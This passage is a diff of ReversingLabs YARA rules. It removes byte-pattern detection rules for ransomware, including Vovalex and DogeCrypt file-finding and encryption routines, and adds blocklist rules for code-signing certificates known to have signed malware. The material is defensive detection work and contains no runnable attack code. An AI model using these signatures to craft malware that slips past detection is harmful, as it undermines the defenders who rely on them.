-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? FF 75 ?? 8D 4D ?? 89 5D ?? 50
-            8D 85 ?? ?? ?? ?? 89 5D ?? 50 53 89 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8
-            ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 89 65 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 8D 75 ?? 50 E8 ?? ??
-            ?? ?? 8B CE C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 58 89 45 ?? 89 5D ?? 88 5D ?? 89 45 ?? 89
-            5D ?? 88 5D ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 8B 39 E9 00 01 00 00 8B 77 ??
-            8D 47 ?? 89 45 ?? 3B 77 ?? 0F 84 EC 00 00 00 8B F8 68 ?? ?? ?? ?? 8B D7 8D 4D ?? E8 ?? ?? ?? ?? 56 8B D0 C6 45 ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 50 8D 4D ?? E8 ?? ?? ?? ?? 53 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 6A ?? 8D 4D
-        }
-		$ol_do_filetypes_3 = {
-            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ??
-            89 65 ?? 8D 45 ?? 83 EC ?? 8B CC 50 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-            81 C4 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 53 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 89 65 ?? 50 E8 ??
-            ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 83 C4 ?? 3B 77 ?? 0F
-            85 1C FF FF FF 8B 4D ?? 8B 7D ?? 8B 3F 89 7D ?? 3B F9 0F 85 F5 FE FF FF 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45
-            ?? ?? 8D 85 ?? ?? ?? ?? 89 65 ?? 8B CC BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC E8 ?? ?? ?? ?? C6 45
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B
-            CC E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 33 F6 8D 8D
-            ?? ?? ?? ?? 53 46 56 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 53 56 8D 4D ?? E8 ?? ?? ?? ?? 53 56 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 53 56 8D 4D ?? E8 ?? ??
-            ?? ?? 8B 4D ?? 5F 5E 64 89 0D ?? ?? ?? ?? 5B 8B E5 5D C3
-        }
-		$ol_ecies_key_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 57 8B F9 33 DB 89 5D ?? 8D 8D ?? ?? ?? ?? 89 7D ?? 89 5D ?? E8 ??
-            ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 46 8D 8D ?? ?? ?? ?? 50 BA ?? ?? ?? ?? 89 75 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B
-            CC 8B D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 56 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
-            ?? ?? BE ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 50 56 FF 75 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 85 C0 0F 85 40 03 00 00 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 51
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B B4 05 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 50 8B 85 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 FF 56 ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 53 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? BB ??
-            ?? ?? ?? 8D 4D ?? 53 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 50 ?? 83 7D ?? ?? 8D 4D ?? 8B F0
-            0F 43 4D ?? 51 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 95 ?? ?? ?? ?? 8B 06 52 8B 48 ?? 03 CE 8B 01 FF 50 ??
-            C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 0D 8B 01 6A ?? 8B 40 ?? 03 C8 8B 01 FF 10 33 F6 C6 45 ?? ?? 56 6A ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 83 EC ?? 8B CC 53 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-        }
-		$ol_ecies_key_2 = {
-            56 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 53
-            E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45
-            ?? ?? 50 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 59 50 8D 4D ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ??
-            56 E8 ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56
-            E8 ?? ?? ?? ?? 59 50 56 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 33 F6 C6 45 ?? ?? 56 50 8D 4D ?? E8 ?? ??
-            ?? ?? 56 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC BA ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 95 ?? ?? ?? ?? 8B CC 89 65 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 53 E8 ??
-            ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ??
-            56 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-        }
-		$ol_ecies_key_3 = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? EB 30 83 EC ?? 8D 55 ?? 8B CC 89 65 ?? E8
-            ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC BB ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 51 8D 4F ??
-            E8 ?? ?? ?? ?? 8D 77 ?? C7 07 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 53 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 46 ?? C6 45 ?? ?? 85 C0 74 05 8D 4E ?? EB 02 33 C9 8D 55 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 8B 06 8B CE FF 50 ?? 6A ?? 68 ?? ?? ?? ?? 8B 08 8B 49 ?? 03 C8 8B 01 FF 50 ?? 53 E8 ?? ?? ?? ?? 59 6A ??
-            6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B C7 5F 5E 64 89 0D ?? ?? ?? ?? 5B
-            8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $ol_do_filetypes_1 and $ol_do_filetypes_2 and $ol_do_filetypes_3 ) and ( $ol_ecies_key_1 and $ol_ecies_key_2 and $ol_ecies_key_3 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VECTOR LLC (VEKTOR, OOO)" and pe.signatures [ i ] . serial == "6f:18:94:6e:5b:77:3b:7e:32:d9:e7:b4:fb:8d:43:4c" and 1454716800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Vovalex : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3596Dfc23B9A42C66700982250Da2906 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Vovalex ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dd4d7969-1afc-5e5d-9324-89f432523173"
-		date = "2021-03-12"
-		modified = "2021-03-12"
+		id = "15c3551f-7b08-5e7f-a540-68b3eccac316"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.Vovalex.yara#L1-L81"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0c0f065224988bcba45b5aba2dceb080479b0bab235d544daabc3cae72e48318"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16998-L17014"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1b69bf520fde5255069cf8752d5c67716e9bc297ddde1566551a563a563197ea"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Vovalex"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ??
-            48 89 BD ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48
-            89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48
-            8B 9D ?? ?? ?? ?? 48 8B 53 ?? 48 8B 03 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48
-            8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 83 F8 ?? 75 ?? 48 8B B5 ??
-            ?? ?? ?? 48 8B 56 ?? 48 8B 06 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 95 ??
-            ?? ?? ?? 8B 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 9D ?? ?? ??
-            ?? 48 8B 53 ?? 48 8B 03 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
-            ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 48 83
-            EC ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 89 9D ?? ??
-            ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 89 85 ?? ?? ?? ?? 48 89 9D ?? ?? ?? ?? 48 8D 15 ??
-            ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ??
-            48 89 8D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 9D ?? ?? ?? ??
-            48 89 9D ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 0D
-            ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 85 ?? ?? ?? ?? 48 89 95 ??
-            ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 1D ??
-            ?? ?? ?? 48 89 9D ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 89 8D ??
-            ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? B9 ?? ?? ??
-            ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4
-        }
-		$find_files_p1 = {
-            48 89 C6 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83
-            EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 06 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC
-            ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89
-            46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89
-            C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ??
-            ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83
-            C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83
-            C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D
-            0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ??
-            ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48
-        }
-		$find_files_p2 = {
-            89 C3 48 8B 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 03 48 89 53 ?? 48 8D 15 ?? ??
-            ?? ?? BF ?? ?? ?? ?? 48 89 7B ?? 48 89 53 ?? 48 8D 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 48
-            89 43 ?? 48 89 4B ?? 48 89 9D ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 45 31 C0
-            4C 89 85 ?? ?? ?? ?? 4C 8D A5 ?? ?? ?? ?? 49 C7 04 24 ?? ?? ?? ?? 49 8B 14 24 48 89
-            95 ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D AD ?? ?? ?? ?? 49 B9 ?? ?? ?? ?? ?? ?? ??
-            ?? 4D 89 4D ?? 49 8B 4D ?? 48 89 8D ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D B5 ?? ??
-            ?? ?? 4D 89 06 49 8B 16 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ??
-            45 31 C0 41 3B C0 7E ?? 41 BF ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ??
-            4D 69 D7 ?? ?? ?? ?? 4D 89 11 4C 89 D2 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ??
-            ?? 48 83 C4 ?? 45 31 C0 41 3B C0 79 ?? 4C 89 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48
-            C7 01 ?? ?? ?? ?? 48 8B 01 48 89 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 8D ?? ??
-            ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 85 C0 7E ?? 48 8B 9D ?? ?? ?? ?? 48 B8
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 EB
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Song WU" and pe.signatures [ i ] . serial == "35:96:df:c2:3b:9a:42:c6:67:00:98:22:50:da:29:06" and 1397219344 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_486Bbddc8C5Ee99F051Ecaeb3F99D2A3 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "07b43dd7-e8f1-5b14-a0f4-42294b5b597e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17016-L17032"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "75855e26ba4e01b56a551a006e789c6032cfb02c6f6125a9bdf8becb848db5b2"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "48:6b:bd:dc:8c:5e:e9:9f:05:1e:ca:eb:3f:99:d2:a3" and 1473292800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Dogecrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_11211Eea9D0D1D1A325B5Eae1B2B1951120F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DogeCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e0ca22a5-70bb-5d2c-bce4-bac49c2a81d2"
-		date = "2021-04-28"
-		modified = "2021-04-28"
+		id = "09b8b3f3-a4aa-5584-b8d0-751cc87267bf"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.DogeCrypt.yara#L1-L114"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1c19862884cf1e59d12c84f5ff6f799a4087ddc8bd887e0d2ce7da053642b851"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17034-L17050"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bafab986605be61d25a6764042937bc5d8c55196ea8ea9aa9360764d9681351b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DogeCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_DogeCrypt_p1 = {
-            50 E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? BA ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 2B C6 89 B5 ?? ?? ?? ?? 3B C8 77 ?? 83 BD ?? ?? ?? ??
-            ?? 8D 3C 31 8D 04 09 89 BD ?? ?? ?? ?? 50 8B 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 43
-            B5 ?? ?? ?? ?? 52 8D 04 46 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 52
-            C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ??
-            ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? 0F 43 45 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68
-            ?? ?? ?? ?? 50 FF D6 8B F8 83 FF ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A
-            ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF D6 8B
-            F0 83 FE ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B
-            8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
-            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ??
-            ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ??
-            ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
-            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ??
-            ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
-            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ??
-            ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
-        }
-		$encrypt_files_DogeCrypt_p2 = {
-            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83
-            FA ?? 0F 82 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
-            ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 90 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF
-            15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 0F 42 DA 85 C0 74
-            ?? 85 C9 74 ?? 51 8D 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ??
-            53 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? EB ?? 56 8B 35 ?? ?? ?? ?? FF D6 57
-            FF D6 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 66 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ??
-            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
-            5D C3
-        }
-		$find_files_DogeCrypt = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
